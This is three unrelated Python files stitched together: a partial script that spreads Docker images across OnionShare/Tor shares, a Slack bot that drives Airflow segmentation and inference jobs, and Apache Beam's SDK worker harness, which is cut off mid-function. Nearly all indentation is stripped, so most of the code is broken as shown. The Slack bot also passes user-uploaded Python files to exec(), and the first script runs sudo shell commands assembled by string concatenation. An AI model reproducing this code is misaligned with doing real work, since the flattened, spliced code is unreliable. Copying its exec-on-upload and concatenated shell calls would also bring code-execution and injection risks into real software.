f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to time issue\n')
f.close()
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt' ):
f = open('onionshare' + str(i) + '.txt' )
lines = f.readlines()
for line in lines:
if line.find('in use') >= 0:
os.system('rm onionshare' + str(i) + '.txt')
threadL[i]._delete()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to address error\n')
f.close()
time.sleep(5)
def hostReqFail():
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website reqFails.txt" + "\" -f reqFailLog.txt")
def reqFail():
failThread = threading.Thread(target=hostReqFail)
threadOn = False
global threads
reqMade = [0]*threads
callSum = 0
while True:
time.sleep(120)
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt'):
f = open('onionshare' + str(i) + '.txt')
lines = f.readlines()
f.close()
for line in lines:
if reqMade[i] == 0 and line.find('get') >= 0:
reqMade[i] = 1
callSum += 1
if callSum >= (threads/2) and callSum != threads:
f = open('reqFails.txt', 'w')
for i in range(0,threads):
if reqMade[i] == 0:
f.write(str(i)+'\n')
if threadOn:
failThread._delete()
failThread = threading.Thread(target=hostReqFail)
failThread.start()
threadOn = True
else:
failThread.start()
threadOn = True
if callSum == threads:
failThread._delete()
threadOn = False
def totalThreadRestarter():
global totalStartTime
global totalAddr
global mainThread
while (True):
if time.time() > totalStartTime + 60 and not totalAddr:
os.system('rm onionshareOrder.txt')
#restart thread
mainThread._delete()
t = threading.Thread(target=shareOrder)
mainThread = t
mainThread.start()
totalStartTime = time.time()
f = open('restart.txt', 'a')
f.write("thread: for toalOrder has been restarted at:" + str(time.time()) + ' due to time issue\n')
f.close()
def resetHost():
global threadL
global orderAddr
global order
global startTimes
global mode
global fileName
global totalAddr
for i in threadL:
i._delete()
threadL = []
orderAddr = []
order = []
startTimes = []
os.remove("totalOrder.txt")
os.remove('onionshareOrder.txt')
os.remove('order.txt')
for leftover in glob.glob('onionshare*.txt'): os.remove(leftover)
if fileName:
    for leftover in glob.glob(fileName + '*.txt'): os.remove(leftover)
mode = ''
fileName = ''
totalAddr = ''
def failingCheck():
global threadL
while True:
time.sleep(120)
positions = []
try:
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
fails = session.get(totalAddr + '/reqFails.txt')
f = open('reqFails.txt', 'wb')
f.write(fails.content)
f.close()
f = open('reqFails.txt', 'r')
lines = f.readlines()
f.close()
for line in lines:
positions.append(int(line.rstrip()))
f = open('totalOrder.txt', 'r')
lines = f.readlines()
for pos in positions:
threadL[pos]._delete()
threadL[pos] = threading.Thread(target=getShare,args=[lines[pos].rstrip(),pos])
threadL[pos].start()
except:
pass
#######################################################################################################################################
########################################################request########################################################################
#######################################################################################################################################
def getShare(address, iter):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
content[iter] = res.content #append this slice's content to total content list
#This thread unneeded now, can safely kill it
killMe(iter)
def getShareWithoutIter(address):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
open("totalOrder.txt", 'wb').write(res.content)
def createThreadsReq():
global totalAddr
flag = True
flagTwo = True
flagThree = True
while flag:
time.sleep(5)
#Addresses written to file (Step 2)
if os.path.isfile("totalOrder.txt") and flagTwo:
flagTwo = False
#Need to make a thread for each address
f = open("totalOrder.txt", 'r')
lines = f.readlines()
f.close()
j = 0
for line in lines:
t = threading.Thread(target=getShare,args=[line.strip('\n'), j])
threadL.append(t)
t.start()
j += 1
#Every slot in content has been written to (Step 3)
elif not (0 in content):
#print(content)
#Tell session it has finished
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
session.get(totalAddr + '/finish') #tell server finished downloading
#Save in chunks, converting to bytes
with open("image.zip", "wb") as f:
for i in range(threads):
for chunk in content[i]:
f.write(bytes(chunk))
resetReq()
flag = False
#totalOrder.txt not yet received (Step 1)
else:
statF = open("stat.txt", 'r')
totalAddr = statF.readline().rstrip()
statF.close()
#if file ready to be received from worker. totalAddr will hold the .onion address
if totalAddr != '' and totalAddr != 'Executing' and totalAddr != 'Ready' and flagThree:
flagThree = False
getShareWithoutIter(totalAddr) #download totalOrder.txt
def resetReq():
global content
global threadL
global mode
global mainThread
global totalAddr
content = [0] * threads
#kill all threads before resetting
for i in threadL:
i._delete()
threadL = []
mainThread = None
totalAddr = None
os.remove("totalOrder.txt")
mode = ''
os.remove('onionshareOrder.txt')
#kill specified thread
def killMe(iter):
threadL[iter]._delete()
#######################################################################################################################################
#####################################################controller########################################################################
#######################################################################################################################################
def getTime(mess):
now = datetime.now()
end = open('log.txt', 'r').readline().rstrip()[24:]
#print(now.strftime("%a %b %d %Y %H:%M:%S" + end))
timestamp = now.strftime("%a %b %d %Y %H:%M:%S" + end)
f = open('log.txt', 'a')
f.write(timestamp + " " + mess)
f.close()
def hostController(file):
splitFile(file)
createThreadsHost()
runThreads()
#Restarter for threads
errCorr = threading.Thread(target=threadRestarter)
errCorr.start()
getAddrs()
failThread = threading.Thread(target=reqFail)
failThread.start()
#Total share
global mainThread
mainThread = threading.Thread(target=shareOrder)
mainThread.start()
#Restarter for total share
errCorrMain = threading.Thread(target=totalThreadRestarter)
errCorrMain.start()
getTotalAddr()
flag = True
while flag:
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
line = f.readline()
while line != '':
if "/finish" in line :
flag = False
errCorr._delete()
mainThread._delete()
line = f.readline()
f.close()
failThread._delete()
resetHost()
def reqController():
failThread = threading.Thread(target=failingCheck)
failThread.start()
createThreadsReq()
failThread._delete()
def dockerExe():
global mode
#this will load the image back into docker
os.system("sudo docker load -i image.tgz")
#this will start the container in a bash
os.system("sudo docker run -dit execute:latest bash")
getTime('Docker Image Loaded and Executing')
#this will execute the code
#0 -> Provider
#1 -> Validator
os.system("sudo docker exec $(sudo docker container ls -q) python3 execute.py " + str(0 if mode == "provider" else 1) )
#this will delete the old image file
os.system("sudo rm -rf image.tgz")
#this will update the container
os.system("sudo docker commit $(sudo docker container ls -q) execute:latest")
getTime("Execution Finished")
#this will remove the image to be transmitted to the next step
os.system("sudo docker save execute -o image.tgz")
#zip the image
os.system('sudo zip -0 image.zip image.tgz')
#this will stop the docker image
os.system("sudo docker stop $(sudo docker container ls -q)")
getTime('Image Unloaded and Ready For Transmission')
def getMode():
global mode
flag = True
while flag:
time.sleep(5)
if os.path.isfile('mode.txt'):
f = open("mode.txt", "r")
curLine = f.readline().rstrip()
f.close()
if(curLine == "provider" or curLine == 'validator' or curLine == "user"):
mode = curLine
flag = False
f = open('mode.txt', 'w')
f.close()
if __name__ == '__main__':
while True:
getMode()
if mode == 'user':
hostController('image.zip')
reqController()
else:
reqController()
dockerExe()
hostController('image.zip') |
slack_bot.py | import slack
import json
import json5
from collections import OrderedDict
import string
from airflow_api import get_variable, run_segmentation, \
update_slack_connection, check_running, dag_state, set_variable, \
sanity_check, chunkflow_set_env, run_inference, run_contact_surface, \
mark_dags_success, run_dag, run_igneous_tasks, run_custom_tasks
from bot_info import slack_token, botid, workerid
from kombu_helper import drain_messages
from copy import deepcopy
import requests
import re
import time
import logging
from secrets import token_hex
import threading
import queue
param_updated = False
def clear_queues():
with q_payload.mutex:
q_payload.queue.clear()
with q_cmd.mutex:
q_cmd.queue.clear()
def create_run_token(msg):
token = token_hex(16)
set_variable("run_token", token)
sc = slack.WebClient(slack_token, timeout=300)
userid = msg['user']
reply_msg = "use `{}, cancel run {}` to cancel the current run".format(workerid, token)
rc = sc.chat_postMessage(
channel=userid,
text=reply_msg
)
if not rc["ok"]:
print("Failed to send direct message")
print(rc)
def gcloud_ip():
metadata_url = "http://169.254.169.254/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip"
response = requests.get(metadata_url, headers={"Metadata-Flavor": "Google"})
if response.status_code == 200:
return response.content.decode("ascii", "ignore")
else:
return "Unknown ip address"
def filter_msg(msg):
if 'subtype' in msg and msg['subtype'] != "thread_broadcast":
return False
text = msg["text"].strip('''_*~"'`''')
if text.startswith(botid):
cmd = extract_command(msg)
if cmd == "report":
report(msg)
return False
if re.search(r"^{}[\s,:]".format(workerid), text, re.IGNORECASE):
return True
def report(msg):
print("preparing report!")
if check_running():
replyto(msg, "{workerid}: busy running segmentation for {owner}".format(
workerid=workerid,
owner=task_owner
), username="seuronbot", broadcast=True)
else:
replyto(msg, "{workerid}: idle".format(
workerid=workerid
), username="seuronbot", broadcast=True)
def extract_command(msg):
cmd = msg["text"].replace(workerid, "").replace(botid, "")
cmd = cmd.translate(str.maketrans('', '', string.punctuation))
cmd = cmd.lower().replace(" ", "")
return cmd
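# Illustration (hypothetical ids): if workerid were "seuronbot-worker", a message of
# "seuronbot-worker: Run Segmentation!" would normalize to "runsegmentation" after
# the ids, punctuation, spaces and upper case are stripped above.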
def replyto(msg, reply, username=workerid, broadcast=False):
sc = slack.WebClient(slack_token, timeout=300)
channel = msg['channel']
userid = msg['user']
thread_ts = msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
reply_msg = "<@{}> {}".format(userid, reply)
rc = sc.chat_postMessage(
username=username,
channel=channel,
thread_ts=thread_ts,
reply_broadcast=broadcast,
text=reply_msg
)
if not rc["ok"]:
print("Failed to send slack message")
print(rc)
def cancel_run(msg):
replyto(msg, "Shutting down clusters...")
cluster_size = get_variable('cluster_target_size', deserialize_json=True)
for k in cluster_size:
cluster_size[k] = 0
set_variable("cluster_target_size", cluster_size, serialize_json=True)
run_dag("cluster_management")
time.sleep(10)
replyto(msg, "Marking all DAG states to success...")
dags = ['segmentation','watershed','agglomeration', 'chunkflow_worker', 'chunkflow_generator', 'igneous', 'custom']
mark_dags_success(dags)
time.sleep(10)
#try again because some tasks might already have been scheduled
dags = ['segmentation','watershed','agglomeration', 'chunkflow_worker', 'chunkflow_generator', 'igneous', 'custom']
mark_dags_success(dags)
time.sleep(10)
replyto(msg, "Draining tasks from the queues...")
drain_messages("amqp://172.31.31.249:5672", "igneous")
drain_messages("amqp://172.31.31.249:5672", "custom")
drain_messages("amqp://172.31.31.249:5672", "chunkflow")
replyto(msg, "*Current run cancelled*", broadcast=True)
def upload_param(msg, param):
sc = slack.WebClient(slack_token, timeout=300)
channel = msg['channel']
userid = msg['user']
thread_ts = msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
sc.files_upload(
channels=channel,
filename="param.json",
filetype="javascript",
thread_ts=thread_ts,
content=json.dumps(param, indent=4),
initial_comment="<@{}> current parameters".format(userid)
)
def update_metadata(msg):
sc = slack.WebClient(slack_token, timeout=300)
payload = {
'user': msg['user'],
'channel': msg['channel'],
'thread_ts': msg['thread_ts'] if 'thread_ts' in msg else msg['ts']
}
update_slack_connection(payload, slack_token)
rc = sc.users_info(
user=msg['user']
)
global task_owner
if rc["ok"]:
task_owner = rc["user"]["profile"]["display_name"]
def download_file(msg):
if "files" not in msg:
replyto(msg, "You need to upload a parameter file with this message")
return None, None
else:
# only use the first file:
file_info = msg["files"][0]
private_url = file_info["url_private_download"]
filetype = file_info["pretty_type"]
response = requests.get(private_url, headers={'Authorization': 'Bearer {}'.format(slack_token)})
if response.status_code == 200:
return filetype, response.content.decode("ascii", "ignore")
else:
return None, None
def download_json(msg):
filetype, content = download_file(msg)
if not content:
return None
if filetype == "JavaScript/JSON":
try:
json_obj = json5.loads(content, object_pairs_hook=OrderedDict)
except (ValueError, TypeError) as e:
replyto(msg, "Cannot load the json file: {}".format(str(e)))
return None
return json_obj
if filetype == "Python":
scope = {}
try:
exec(content, scope)
if "submit_parameters" not in scope or not callable(scope["submit_parameters"]):
return None
payloads = scope['submit_parameters']()
except Exception:
replyto(msg, "Cannot execute the `submit_parameters` function in the script")
return None
upload_param(msg, payloads)
return payloads
def update_inference_param(msg):
global param_updated
json_obj = download_json(msg)
if json_obj:
if not check_running():
clear_queues()
drain_messages("amqp://172.31.31.249:5672", "chunkflow")
if isinstance(json_obj, list):
replyto(msg, "*{} batch jobs detected, only sanity check the first one for now*".format(len(json_obj)))
q_payload.put(json_obj)
json_obj = json_obj[0]
supply_default_param(json_obj)
replyto(msg, "Running chunkflow setup_env, please wait")
update_metadata(msg)
set_variable('inference_param', json_obj, serialize_json=True)
chunkflow_set_env()
param_updated = True
else:
replyto(msg, "Busy right now")
return
def update_param(msg):
global param_updated
json_obj = download_json(msg)
if json_obj:
if not check_running():
clear_queues()
if isinstance(json_obj, list):
if (len(json_obj) > 1):
replyto(msg, "*{} batch jobs detected, only sanity check the first one for now*".format(len(json_obj)))
q_payload.put(json_obj)
json_obj = json_obj[0]
supply_default_param(json_obj)
replyto(msg, "Running sanity check, please wait")
update_metadata(msg)
set_variable('param', json_obj, serialize_json=True)
sanity_check()
param_updated = True
else:
replyto(msg, "Busy right now")
return
def run_igneous_scripts(msg):
_, payload = download_file(msg)
if payload:
if not check_running():
create_run_token(msg)
update_metadata(msg)
set_variable('igneous_script', payload)
replyto(msg, "Execute `submit_tasks` function")
run_igneous_tasks()
else:
replyto(msg, "Busy right now")
return
def run_custom_scripts(msg):
_, payload = download_file(msg)
if payload:
if not check_running():
create_run_token(msg)
update_metadata(msg)
set_variable('custom_script', payload)
replyto(msg, "Execute `submit_tasks` function")
run_custom_tasks()
else:
replyto(msg, "Busy right now")
return
def supply_default_param(json_obj):
if not json_obj.get("NAME", ""):
json_obj["NAME"] = token_hex(16)
if "SCRATCH_PREFIX" not in json_obj and "SCRATCH_PATH" not in json_obj:
json_obj["SCRATCH_PREFIX"] = "gs://ranl_pipeline_scratch/"
for p in ["WS","SEG"]:
if "{}_PREFIX".format(p) not in json_obj and "{}_PATH".format(p) not in json_obj:
json_obj["{}_PREFIX".format(p)] = json_obj.get("NG_PREFIX", "gs://ng_scratch_ranl/make_cv_happy/") + p.lower() + "/"
def dispatch_command(cmd, payload):
global param_updated
msg = payload['data']
print(cmd)
if cmd == "parameters":
param = get_variable("param", deserialize_json=True)
upload_param(msg, param)
elif cmd == "updateparameters":
update_param(msg)
elif cmd == "updateinferenceparameters":
update_inference_param(msg)
elif cmd.startswith("cancelrun"):
token = get_variable("run_token")
if not token:
replyto(msg, "The bot is idle, nothing to cancel")
elif cmd != "cancelrun"+token:
replyto(msg, "Wrong token")
else:
if check_running():
clear_queues()
q_cmd.put("cancel")
cancel_run(msg)
set_variable("run_token", "")
else:
replyto(msg, "The bot is idle, nothing to cancel")
elif cmd == "runsegmentation" or cmd == "runsegmentations":
state, _ = dag_state("sanity_check")
if check_running():
replyto(msg, "I am busy right now")
elif not param_updated:
replyto(msg, "You have to update the parameters before starting the segmentation")
elif state != "success":
replyto(msg, "Sanity check failed, try again")
else:
replyto(msg, "Start segmentation")
create_run_token(msg)
update_metadata(msg)
param_updated = False
if q_payload.qsize() == 0:
run_segmentation()
else:
q_payload.put(msg)
q_cmd.put("runseg")
elif cmd == "runinference" or cmd == "runinferences":
state, _ = dag_state("chunkflow_generator")
if check_running():
replyto(msg, "I am busy right now")
elif not param_updated:
replyto(msg, "You have to update the parameters before starting the inference")
elif state != "success":
replyto(msg, "Chunkflow set_env failed, try again")
else:
replyto(msg, "Start inference")
create_run_token(msg)
update_metadata(msg)
param_updated = False
if q_payload.qsize() == 0:
run_inference()
else:
q_payload.put(msg)
q_cmd.put("runinf")
elif cmd == "runigneoustask" or cmd == "runigneoustasks":
if check_running():
replyto(msg, "I am busy right now")
else:
run_igneous_scripts(msg)
elif cmd == "runcustomtask" or cmd == "runcustomtasks":
if check_running():
replyto(msg, "I am busy right now")
else:
run_custom_scripts(msg)
elif cmd == "extractcontactsurfaces":
state, _ = dag_state("sanity_check")
if check_running():
replyto(msg, "I am busy right now")
elif state != "success":
replyto(msg, "Sanity check failed, try again")
else:
replyto(msg, "Extract contact surfaces")
create_run_token(msg)
update_metadata(msg)
param_updated = False
run_contact_surface()
else:
replyto(msg, "Sorry I do not understand, please try again.")
@slack.RTMClient.run_on(event='message')
def process_message(**payload):
m = payload['data']
print(json.dumps(m, indent=4))
if filter_msg(m):
cmd = extract_command(m)
dispatch_command(cmd, payload)
@slack.RTMClient.run_on(event='reaction_added')
def process_reaction(**payload):
print("reaction added")
m = payload['data']
print(json.dumps(m, indent=4))
@slack.RTMClient.run_on(event='hello')
def hello_world(**payload):
client = slack.WebClient(token=slack_token)
host_ip = gcloud_ip()
set_variable("webui_ip", host_ip)
client.chat_postMessage(
channel='#seuron-alerts',
username=workerid,
text="Hello world from <https://{}/airflow/admin/|{}>!".format(host_ip, host_ip))
def handle_batch(q_payload, q_cmd):
while True:
current_task="runseg"
logger.debug("check queue")
time.sleep(1)
if q_payload.qsize() == 0:
continue
if q_cmd.qsize() != 0:
cmd = q_cmd.get()
if cmd != "runseg" and cmd != "runinf":
continue
else:
current_task = cmd
else:
continue
logger.debug("get message from queue")
json_obj = q_payload.get()
msg = q_payload.get()
if json_obj is None:
continue
if (not isinstance(json_obj, list)) or (not isinstance(json_obj[0], dict)):
replyto(msg, "Batch process expects an array of dicts from the json file")
continue
replyto(msg, "Batch jobs will reuse on the parameters from the first job unless new parameters are specified, *including those with default values*")
default_param = json_obj[0]
for i, p in enumerate(json_obj):
if q_cmd.qsize() != 0:
cmd = q_cmd.get()
if cmd == "cancel":
replyto(msg, "Cancel batch process")
break
param = deepcopy(default_param)
if i > 0:
if 'NAME' in param:
del param['NAME']
for k in p:
param[k] = p[k]
supply_default_param(param)
update_metadata(msg)
replyto(msg, "*Sanity check: batch job {} out of {}*".format(i+1, len(json_obj)))
state = "unknown"
if current_task == "runseg":
set_variable('param', param, serialize_json=True)
sanity_check()
wait_for_airflow()
state, _ = dag_state("sanity_check")
elif current_task == "runinf":
set_variable('inference_param', param, serialize_json=True)
chunkflow_set_env()
wait_for_airflow()
state, _ = dag_state("chunkflow_generator")
if state != "success":
replyto(msg, "*Sanity check failed, abort!*")
break
state = "unknown"
replyto(msg, "*Starting batch job {} out of {}*".format(i+1, len(json_obj)), broadcast=True)
if current_task == "runseg":
run_segmentation()
wait_for_airflow()
state, _ = dag_state("segmentation")
elif current_task == "runinf":
run_inference()
wait_for_airflow()
state, _ = dag_state("chunkflow_worker")
if state != "success":
replyto(msg, "*Bach job failed, abort!*")
break
replyto(msg, "*Batch process finished*")
def wait_for_airflow():
while check_running():
logger.debug("waiting for airflow")
time.sleep(60)
if __name__ == '__main__':
task_owner = "seuronbot"
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
q_payload = queue.Queue()
q_cmd = queue.Queue()
batch = threading.Thread(target=handle_batch, args=(q_payload, q_cmd,))
hello_world()
batch.start()
#logger.info("subprocess pid: {}".format(batch.pid))
rtmclient = slack.RTMClient(token=slack_token)
rtmclient.start()
batch.join()
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self._fns = {}
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
# workers for process/finalize bundle.
self.workers = queue.Queue()
# one worker for progress/split request.
self.progress_worker = SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory)
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
# finalize and process share one thread pool.
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create process workers
for _ in range(self._worker_count):
# SdkHarness manages function registration and shares self._fns with all
# the workers. This is needed because function registration (register)
# and execution (process_bundle) are sent over different requests, so we
# do not really know which worker is going to process the bundle
# for a function until we get the process_bundle request. Moreover, the
# same function is reused by different process bundle calls and may
# be executed by different workers. Hence we need a
# centralized function list shared among all the workers.
self.workers.put(
SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name-spacing the request method with '_request_'. The called method
# will be like self._request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
self._execute(task, request)
def _request_process_bundle(self, request):
def task():
# Take the free worker. Wait till a worker is free.
worker = self.workers.get()
# Get the first work item in the queue
work = self._process_bundle_queue.get()
self._unscheduled_process_bundle.pop(work.instruction_id, None)
try:
self._execute(lambda: worker.do_instruction(work), work)
finally:
# Put the worker back in the free worker pool
self.workers.put(worker)
# Create a task for each process_bundle request and schedule it
self._process_bundle_queue.put(request)
self._unscheduled_process_bundle[request.instruction_id] = time.time()
self._process_thread_pool.submit(task)
logging.debug(
"Currently using %s threads." % len(self._process_thread_pool._threads))
def _request_process_bundle_split(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_progress(self, request):
self._request_process_bundle_action(request)
def _request_process_bundle_action(self, request):
def task():
instruction_reference = getattr(
request, request.WhichOneof('request')).instruction_reference
# only process a progress/split request when the bundle is being processed.
if (instruction_reference in
self._bundle_processor_cache.active_bundle_processors):
self._execute(
lambda: self.progress_worker.do_instruction(request), request)
else:
self._execute(lambda: beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=(
'Process bundle request not yet scheduled for instruction {}' if
instruction_reference in self._unscheduled_process_bundle else
'Unknown process bundle instruction {}').format(
instruction_reference)), request)
self._progress_thread_pool.submit(task)
def _request_finalize_bundle(self, request):
def task():
# Get one available worker.
worker = self.workers.get()
try:
self._execute(
lambda: worker.do_instruction(request), request)
finally:
# Put the worker back in the free worker pool.
self.workers.put(worker)
self._process_thread_pool.submit(task)
def _monitor_process_bundle(self):
"""
Monitor the unscheduled bundles and log if a bundle is not scheduled for
more than SCHEDULING_DELAY_THRESHOLD_SEC.
"""
while self._alive:
time.sleep(SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC)
# Check for bundles to be scheduled.
if self._unscheduled_process_bundle:
current_time = time.time()
for instruction_id in self._unscheduled_process_bundle:
request_time = None
try:
request_time = self._unscheduled_process_bundle[instruction_id]
except KeyError:
pass
if request_time:
scheduling_delay = current_time - request_time
if scheduling_delay > SdkHarness.SCHEDULING_DELAY_THRESHOLD_SEC:
logging.warn('Unable to schedule instruction %s for %s seconds',
instruction_id, scheduling_delay)
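# Illustrative sketch (not part of the SDK harness): the name-spaced dispatch used
# by SdkHarness.run() above. The oneof field name of the incoming request is
# prefixed with '_request_' and resolved with getattr, so adding a handler only
# requires defining a method with the matching name.
class _DispatchSketch(object):
    REQUEST_METHOD_PREFIX = '_request_'

    def dispatch(self, request_type, request):
        return getattr(self, self.REQUEST_METHOD_PREFIX + request_type)(request)

    def _request_register(self, request):
        return 'registered %r' % (request,)

# e.g. _DispatchSketch().dispatch('register', {'id': 1}) -> "registered {'id': 1}"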
class BundleProcessorCache(object):
def __init__(self, state_handler_factory, data_channel_factory, fns):
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.active_bundle_processors = {}
self.cached_bundle_processors = collections.defaultdict(list)
def register(self, bundle_descriptor):
self.fns[bundle_descriptor.id] = bundle_descriptor
def get(self, instruction_id, bundle_descriptor_id):
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
except IndexError:
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
return processor
def lookup(self, instruction_id):
return self.active_bundle_processors.get(instruction_id, (None, None))[-1]
def discard(self, instruction_id):
del self.active_bundle_processors[instruction_id]
def release(self, instruction_id):
descriptor_id, processor = self.active_bundle_processors.pop(instruction_id)
processor.reset()
self.cached_bundle_processors[descriptor_id].append(processor)
class SdkWorker(object):
def __init__(self, bundle_processor_cache, profiler_factory=None):
self.bundle_processor_cache = bundle_processor_cache
self.profiler_factory = profiler_factory
def do_instruction(self, request):
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register, request.instruction_id)
return getattr(self, request_type)(getattr(request, request_type),
request.instruction_id)
else:
raise NotImplementedError
def register(self, request, instruction_id):
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(self, request, instruction_id):
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_reference)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
metrics=bundle_processor.metrics(),
monitoring_infos=bundle_processor.monitoring_infos(),
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=processor.try_split(request))
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
def process_bundle_progress(self, request, instruction_id):
